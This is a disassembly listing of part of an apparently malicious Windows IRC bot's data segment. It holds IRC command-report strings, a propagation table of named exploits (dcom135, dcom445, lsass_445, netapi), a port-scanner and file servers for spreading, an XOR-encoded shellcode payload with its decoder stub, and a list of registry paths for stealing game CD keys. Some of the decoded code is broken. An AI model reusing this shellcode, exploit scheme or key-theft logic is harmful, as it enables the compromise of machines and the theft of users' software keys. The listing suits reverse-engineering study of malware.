unk_42A61C db 2 ; DATA XREF: sub_4060D0+212�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aWorkerThreadOf db 'Worker thread of server thread: %d.',0
asc_42A65C: ; DATA XREF: sub_4060D0+15A�o
unicode 0, <*>,0
asc_42A660: ; DATA XREF: sub_4060D0+FB�o
; sub_406387+29�o ...
dw 0Ah
unicode 0, <>,0
aSS_2 db '%s%s',0 ; DATA XREF: sub_4060D0+EA�o
; sub_406387+4DA�o ...
align 4
aS_3 db '%s',0 ; DATA XREF: sub_4060D0+3A�o
; sub_40B390+4C�o ...
align 10h
aS_4 db '\%s',0 ; DATA XREF: sub_4060D0+2F�o
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
; DATA XREF: sub_406387+652�o
align 4
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_406387+637�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 4
aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_406387+61C�o
align 4
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_406387+58D�o
align 10h
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_406387+571�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_406387:loc_4068AF�o
align 10h
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_406387+521�o
align 10h
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_406387+46E�o
align 4
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_406387+42F�o
align 4
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_406387+3F9�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_406387:loc_406741�o
align 4
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_406387+3B3�o
align 4
aSS_0 db '%s%s/',0 ; DATA XREF: sub_406387+36C�o
align 10h
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_406387+328�o
; sub_406387+496�o
db '<TD WIDTH="%d"><A HREF="',0
align 10h
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_406387+310�o
align 4
aS_0 db '<%s>',0 ; DATA XREF: sub_406387+2E9�o
; sub_406387+40B�o
align 4
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_406387+2BF�o
aAm db 'AM',0 ; DATA XREF: sub_406387+295�o
align 4
aPm db 'PM',0 ; DATA XREF: sub_406387+28A�o
align 4
a__ db '..',0 ; DATA XREF: sub_406387+237�o
align 10h
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_406387+1C5�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_406387+149�o
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_406387+12D�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_406387+F9�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_406387+AE�o
db '<TABLE BORDER="0">',0Dh,0Ah,0
align 4
aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_406387+79�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 4
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_406387+4B�o
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: sub_406AF8+8F�o
db 'Referer: %s',0Ah
db 'Host: %s',0Ah
db 'Connection: close',0Ah
db 0Ah,0
dword_42AB14 dd 4000500h, 7868746Bh, 0 ; DATA XREF: sub_406C19+493�o
dword_42AB20 dd 7A026E02h, 201F6D1Fh, 74667428h, 1F702E70h, 29671F6Ch
; DATA XREF: sub_406C19+47F�o
dd 0BBBB0220h, 74202002h, 736E6172h, 20726566h, 20206F74h
dd 20207325h, 75731F02h, 73656363h, 6C756673h, 6320796Ch
dd 6C706D6Fh, 64657465h, 202C021Fh, 6F666E69h, 2528203Ah
dd 2E2973h
unk_42AB74 db 2 ; DATA XREF: sub_406C19+3B6�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFileNotFoundSS db ' File not found: %s (%s).',0
dword_42ABA8 dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh
; DATA XREF: sub_406C19+399�o
dword_42ABBC dd 7A026E02h, 201F6D1Fh, 74667428h, 1F702E70h, 29671F6Ch
; DATA XREF: sub_406C19+33E�o
dd 0BBBB0220h, 74202002h, 736E6172h, 20726566h, 20206F74h
dd 20207325h, 65621F02h, 6E6E6967h, 1F676E69h, 69202C02h
dd 3A6F666Eh, 73252820h, 2E29h
unk_42AC04 db 2 ; DATA XREF: sub_406C19+15A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToOpenFi db ' Failed to open file: %s.',0
unk_42AC38 db 2 ; DATA XREF: sub_406C19+6A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorSocketF_2 db ' Error: socket() failed, returned: <%d>.',0
align 4
aOctet db 'octet',0 ; DATA XREF: sub_406C19+F�o
align 8
aDcom135_0 db 'dcom135',0 ; DATA XREF: sub_407767+169�o
db 2 dup(0)
aDcom135 db 'Dcom135',0 ; DATA XREF: _0:00405361�o
align 4
dd 5 dup(0)
dword_42ACB0 dd 87h ; DATA XREF: sub_407110+1E�r
; sub_40EE72+30B3�r ...
off_42ACB4 dd offset sub_402DD7 ; DATA XREF: sub_407767+1EA�r
dword_42ACB8 dd 0 ; DATA XREF: sub_402DD7+2E1�w
; sub_402DD7+2E7�r ...
dword_42ACBC dd 1 ; DATA XREF: sub_407252+1F�r
dword_42ACC0 dd 0 ; DATA XREF: sub_407252:loc_4074C3�r
aDcom445 db 'dcom445',0
dd 63440000h, 34346D6Fh, 35h, 5 dup(0)
dd 1BDh, 402DD7h, 0
dd 1, 0
aDcom1025 db 'dcom1025',0
align 2
aDcom1025_0 db 'Dcom1025',0
align 4
dd 5 dup(0)
dd 401h, 402DD7h, 0
dd 1, 0
aLsass_445 db 'lsass_445',0
aLsass_445_0 db 'lsass_445',0
dd 5 dup(0)
dd 1BDh, 403688h, 0
dd 2 dup(1), 7361736Ch, 33315F73h, 736C0035h, 5F737361h
dd 353331h, 5 dup(0)
dd 87h, 403688h, 0
dd 2 dup(1), 7361736Ch, 33315F73h, 736C0039h, 5F737361h
dd 393331h, 5 dup(0)
dd 8Bh, 403688h, 0
dd 2 dup(1), 346E7361h, 3534h, 73610000h, 6D73316Eh, 62h
dd 5 dup(0)
dd 1BDh, 40428Fh, 0
dd 2 dup(1), 316E7361h, 3933h, 73610000h, 6D73316Eh, 746E62h
dd 5 dup(0)
dd 8Bh, 40428Fh, 0
dd 2 dup(1), 6970616Eh, 353434h, 656E0000h, 69706174h
dd 353434h, 5 dup(0)
dd 1BDh, 404F42h, 2 dup(0)
dd 1, 6970616Eh, 393331h, 656E0000h, 69706174h, 393331h
dd 5 dup(0)
dd 8Bh, 404F42h, 2 dup(0)
dd 1, 6D7973h, 0
dd 79730000h, 746E616Dh, 6365h, 5 dup(0)
dd 0B97h, 405088h, 0
dd 1, 0
dd 636874h, 0
dd 68540000h, 6C717363h, 6 dup(0)
dd 599h, 40527Eh, 0 ; CODE XREF: sub_42AF96:loc_42AFAB�j
dd 1, 10h dup(0)
; ---------------------------------------------------------------------------
jmp short loc_42AFA6
; =============== S U B R O U T I N E =======================================
sub_42AF96 proc near ; CODE XREF: sub_42AF96:loc_42AFA6�p
pop edx
dec edx
xor ecx, ecx
mov cx, 166h
loc_42AF9E: ; CODE XREF: sub_42AF96+C�j
xor byte ptr [edx+ecx], 99h
loop loc_42AF9E
jmp short loc_42AFAB
; ---------------------------------------------------------------------------
loc_42AFA6: ; CODE XREF: _2:0042AF94�j
call sub_42AF96
loc_42AFAB: ; CODE XREF: sub_42AF96+E�j
jo short near ptr dword_42AF44+2
cwde
cdq
cdq
retn
sub_42AF96 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 21h, 95h, 69h
dd 9912E664h, 3485E912h, 1291D912h, 0A5EA1241h, 0EF126A9Ah
dd 126A9AE1h, 629AB9E7h, 0AA8DD712h, 0C8CECF74h, 629AA612h
dd 97F36B12h, 0ED3F6AC0h, 1AC6C091h, 7BDC9D5Eh, 0C7C6C070h
dd 0DF125412h, 485A9ABDh, 0AA589A78h, 9112FF50h, 9A85DF12h
dd 9B78585Ah, 9912589Ah, 63125A9Ah, 5F1A6E12h, 0F3491297h
dd 0E571C09Ah, 1A999999h, 0CFCB945Fh, 0C365CE66h, 9DF34112h
dd 99F071C0h, 0C9C99999h, 98F3C9C9h, 0CE669BF3h, 5E411269h
dd 9E999B9Eh, 1059AA24h, 89F39DDEh, 0CE66CACEh, 0CA98F36Dh
dd 0C961CE66h, 0CE66CAC9h, 0DD751A65h, 42AA6D12h, 10C089F3h
dd 627B1785h, 10A1DF10h, 0DF10A5DFh, 0B5DF5ED9h, 99999898h
dd 0C989DE14h, 0CACACACFh, 0CACA98F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0CAC9A5DEh, 0C97DCE66h, 0AA71CE66h, 591C3559h, 0CBC860ECh
dd 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66676271h, 0EDFCDE66h
dd 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh, 0EBC9FCEDh
dd 0EAFCFAF6h, 0DC99D8EAh, 0C9EDF0E1h, 0FCFAF6EBh, 0D599EAEAh
dd 0D5FDF8F6h, 0F8EBFBF0h, 99D8E0EBh, 0C6ABEAEEh, 0CE99ABAAh
dd 0F6CAD8CAh, 0EDFCF2FAh, 0F0FB99D8h, 0F599FDF7h, 0FCEDEAF0h
dd 0FAF899F7h, 0EDE9FCFAh, 99h
aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: sub_407110+82�o
align 4
aSD db ' %s: %d,',0 ; DATA XREF: sub_407110+42�o
align 4
unk_42B134 db 2 ; DATA XREF: sub_407110+11�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aExploitStatist db ' Exploit Statistics:',0
align 4
unk_42B168 db 2 ; DATA XREF: sub_4071DB+42�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aScanNotActive_ db ' Scan not active.',0
unk_42B198 db 2 ; DATA XREF: sub_4071DB+2C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aCurrentIpS_ db ' Current IP: %s.',0
align 4
unk_42B1C8 db 2 ; DATA XREF: sub_407252+36F�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToStartS db 'Failed to start server, error: <%d>.',0
align 4
unk_42B20C db 2 ; DATA XREF: sub_407252+307�o
; sub_40EE72+54B9�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aServerListenin db 'Server listening on IP: %s:%d, Directory: %s\.',0
align 4
dword_42B258 dd 7A026E02h, 201F6D1Fh, 70746628h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_407252+267�o
dd 2BBBB02h
aFailedToStar_0 db ' Failed to start server, error: <%d>.',0
align 4
dword_42B298 dd 7A026E02h, 201F6D1Fh, 70746628h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_407252+1FA�o
dd 2BBBB02h
aServerStartedO db ' Server started on Port: %d, File: %s, Request: %s.',0
align 4
unk_42B2E8 db 2 ; DATA XREF: sub_407252+149�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStar_1 db ' Failed to start server, error: <%d>.',0
unk_42B328 db 2 ; DATA XREF: sub_407252+DB�o
; sub_40EE72+5343�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aServerStarte_0 db ' Server started on Port: %d, File: %s, Request: %s.',0
align 4
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_40762E+38�o
; sub_40AEE0+46�o
unk_42B384 db 2 ; DATA XREF: sub_407767+EE�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aIpSPortDIsOpen db ' IP: %s, Port %d is open.',0
unk_42B3BC db 2 ; DATA XREF: sub_407767+93�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aIpSDScanThread db ' IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0
align 4
unk_42B408 db 2 ; DATA XREF: sub_40797F+1CE�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFinishedAtSDAf db ' Finished at %s:%d after %d minute(s) of scanning.',0
align 4
unk_42B45C db 2 ; DATA XREF: sub_40797F+173�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStar_2 db ' Failed to start worker thread, error: <%d>.',0
align 4
unk_42B4A8 db 2 ; DATA XREF: sub_40797F+103�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSDScanThreadDS db ' %s:%d, Scan thread: %d, Sub-thread: %d.',0
align 10h
unk_42B4F0 db 2 ; DATA XREF: sub_40797F+87�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToInitia db ' Failed to initialize critical section.',0
align 4
unk_42B538 db 2 ; DATA XREF: sub_407BDE+156�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStartC db ' Failed to start client thread, error: <%d>.',0
unk_42B584 db 2 ; DATA XREF: sub_407BDE+E1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aClientConnecti db ' Client connection from IP: %s:%d, Server thread: %d.',0
align 4
unk_42B5DC db 2 ; DATA XREF: sub_407D66+1AA�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStar_3 db ' Failed to start connection thread, error: <%d>.',0
unk_42B62C db 2 ; DATA XREF: sub_407D66+E1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aClientConnec_0 db ' Client connection to IP: %s:%d, Server thread: %d.',0
align 10h
unk_42B680 db 2 ; DATA XREF: sub_407FEA+1B2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToStar_4 db 'Failed to start server on Port %d.',0
align 10h
unk_42B6C0 db 2 ; DATA XREF: sub_407FEA+18F�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToStar_5 db 'Failed to start client thread, error: <%d>.',0
unk_42B708 db 2 ; DATA XREF: sub_407FEA+114�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aClientConnec_1 db 'Client connection from IP: %s:%d, Server thread: %d.',0
align 4
unk_42B75C db 2 ; DATA XREF: sub_407FEA+A8�o
; sub_40EE72+5E22�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aServerStarte_1 db 'Server started on: %s:%d.',0
align 4
unk_42B794 db 2 ; DATA XREF: sub_4081EF+1F9�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorFailedToC db 'Error: Failed to connect to target, returned: <%d>.',0
unk_42B7E4 db 2 ; DATA XREF: sub_4081EF+18A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorFailedToO db 'Error: Failed to open socket(), returned: <%d>.',0
unk_42B830 db 2 ; DATA XREF: sub_4081EF+F2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aAuthentication db 'Authentication failed. Remote userid: %s != %s.',0
aDisplay db 'DISPLAY',0 ; DATA XREF: sub_4085B3+11�o
aWindow db 'Window',0 ; DATA XREF: sub_4087EE+23�o
; sub_4089E7+26�o
align 10h
dd 80000001h
off_42B894 dd offset aSoftwareValveC ; DATA XREF: sub_408C26+C�r
; sub_408C26+21�o
; "Software\\Valve\\CounterStrike\\Settings"
; ---------------------------------------------------------------------------
push 500042CAh
retf 42h
; ---------------------------------------------------------------------------
dword_42B8A0 dd 2 dup(0) ; DATA XREF: sub_408C26+26�o
dd 80000001h, 42CA28h, 42CA1Ch, 42CA0Ch, 2 dup(0)
dd 80000001h, 42C9ECh, 42C9E8h, 42C9D4h, 2 dup(0)
dd 80000001h, 42C9B0h, 42C9E8h, 42C9A4h, 2 dup(0)
dd 80000001h, 42C980h, 42C978h, 42C964h, 2 dup(0)
dd 80000001h, 42C950h, 42C940h, 42C924h, 2 dup(0)
dd 80000001h, 42C8E0h, 42CA68h, 42C8CCh, 2 dup(0)
dd 80000002h, 42C8A0h, 42C894h, 42C874h, 2 dup(0)
dd 80000002h, 42C840h, 42CA68h, 42C828h, 2 dup(0)
dd 80000002h, 42C7F4h, 42CA68h, 42C7DCh, 2 dup(0)
dd 80000002h, 42C7C4h, 42CA68h, 42C7ACh, 2 dup(0)
dd 80000002h, 42C770h, 436EDCh, 42C760h, 2 dup(0)
dd 80000002h, 42C728h, 436EDCh, 42C714h, 2 dup(0)
dd 80000002h, 42C6C8h, 436EDCh, 42C6A8h, 2 dup(0)
dd 80000002h, 42C658h, 436EDCh, 42C62Ch, 2 dup(0)
dd 80000002h, 42C5F0h, 436EDCh, 42C5DCh, 2 dup(0)
dd 80000002h, 42C5A4h, 436EDCh, 42C594h, 2 dup(0)
dd 80000002h, 42C544h, 436EDCh, 42C518h, 2 dup(0)
dd 80000002h, 42C4D8h, 436EDCh, 42C4BCh, 2 dup(0)
dd 80000002h, 42C48Ch, 436EDCh, 42C46Ch, 2 dup(0)
dd 80000002h, 42C430h, 436EDCh, 42C41Ch, 2 dup(0)
dd 80000002h, 42C3D4h, 436EDCh, 42C3B4h, 2 dup(0)
; ---------------------------------------------------------------------------
add al, [eax]
add ds:byte_42C360[eax], al
fsubr qword ptr [esi+43h]
add [eax], dh
retn
; ---------------------------------------------------------------------------
dw 42h
dd 2 dup(0)
dd 80000002h, 42C2E0h, 436EDCh, 42C2B4h, 2 dup(0)
dd 80000002h, 42C274h, 42C26Ch, 42C24Ch, 2 dup(0)
dd 80000002h, 42C208h, 436EDCh, 42C1ECh, 2 dup(0)
dd 80000002h, 42C1A0h, 436EDCh, 42C17Ch, 2 dup(0)
dd 80000002h, 42C148h, 436EDCh, 42C13Ch, 2 dup(0)
dd 80000002h, 42C108h, 436EDCh, 42C0FCh, 2 dup(0)
dd 80000002h, 42C0C8h, 436EDCh, 42C0BCh, 2 dup(0)
dd 80000002h, 42C088h, 436EDCh, 42C07Ch, 2 dup(0)
dd 80000002h, 42C040h, 436EDCh, 42C02Ch, 2 dup(0)
dd 80000002h, 42BFF0h, 436EDCh, 42BFDCh, 2 dup(0)
dd 80000002h, 42BFACh, 42CA68h, 42BF90h, 2 dup(0)
dd 80000002h, 42BF70h, 42BF68h, 42BF44h, 2 dup(0)
dd 80000002h, 42BF28h, 42BF68h, 42BF08h, 2 dup(0)
dd 80000002h, 42BEE8h, 42BF68h, 42BEC4h, 2 dup(0)
dd 80000002h, 42BEACh, 42BF68h, 42BEA8h, 2 dup(0)
dd 80000002h, 42BE8Ch, 42BE7Ch, 42BE74h, 2 dup(0)
dd 80000002h, 42BE40h, 42BE3Ch, 42BE24h, 2 dup(0)
dd 80000002h, 42BDE8h, 42BDDCh, 42BDB4h, 42BDA4h, 42BD90h
dd 80000002h, 42BD6Ch, 42BD60h, 42BD4Ch, 42BD3Ch, 42BD34h
dd 80000002h, 42BD6Ch, 42BD60h, 42BD08h, 42BD3Ch, 42BD00h
dd 80000002h, 42BD6Ch, 42BD60h, 42BCD0h, 42BD3Ch, 42BCC8h
dd 6 dup(0)
dd 3379654Bh, 3Dh, 6576654Eh, 6E697772h, 20726574h, 6867694Eh
dd 28207374h, 64726F48h, 6F207365h, 68742066h, 6E552065h
dd 64726564h, 296B7261h, 0
dd 3279654Bh, 3Dh, 6576654Eh, 6E697772h, 20726574h, 6867694Eh
dd 28207374h, 64616853h, 2073776Fh, 5520666Fh, 6572646Eh
dd 6469746Eh, 2965h, 3179654Bh, 3Dh, 636E776Eh, 79656B64h
dd 696E692Eh, 0
aNeverwinterNig db 'Neverwinter Nights',0
align 10h
aLocation db 'Location',0
align 4
aSoftwareBiowar db 'Software\BioWare\NWN\Neverwinter',0
align 10h
aMtkwftmkemfew3 db 'mtkwftmkemfew3p3b7',0
align 4
aBaseMpSof2key db 'base\mp\sof2key',0
aSoldierOfFortu db 'Soldier of Fortune II - Double Helix',0
align 4
aInstallpath db 'InstallPath',0
db 53h
aOftwareActivis db 'oftware\Activision\Soldier of Fortune II - Double Helix',0
align 4
aHiddenDangerou db 'Hidden & Dangerous 2',0
align 4
aKey db 'key',0
db 53h
aOftwareIllusio db 'oftware\Illusion Softworks\Hidden & Dangerous 2',0
align 4
aChrome db 'Chrome',0
align 4
aSerialnumber db 'SerialNumber',0
align 4
db 53h
aOftwareTechlan db 'oftware\Techland\Chrome',0
align 4
aNox db 'NOX',0
aSoftwareWestwo db 'Software\Westwood\NOX',0
align 4
aCommandAndConq db 'Command and Conquer: Red Alert 2',0
align 4
db 53h
aOftwareWestwoo db 'oftware\Westwood\Red Alert 2',0
align 4
aCommandAndCo_0 db 'Command and Conquer: Red Alert',0
align 4
db 53h
aOftwareWestw_0 db 'oftware\Westwood\Red Alert',0
aCommandAndCo_1 db 'Command and Conquer: Tiberian Sun',0
align 4
aSerial db 'Serial',0
align 10h
db 53h
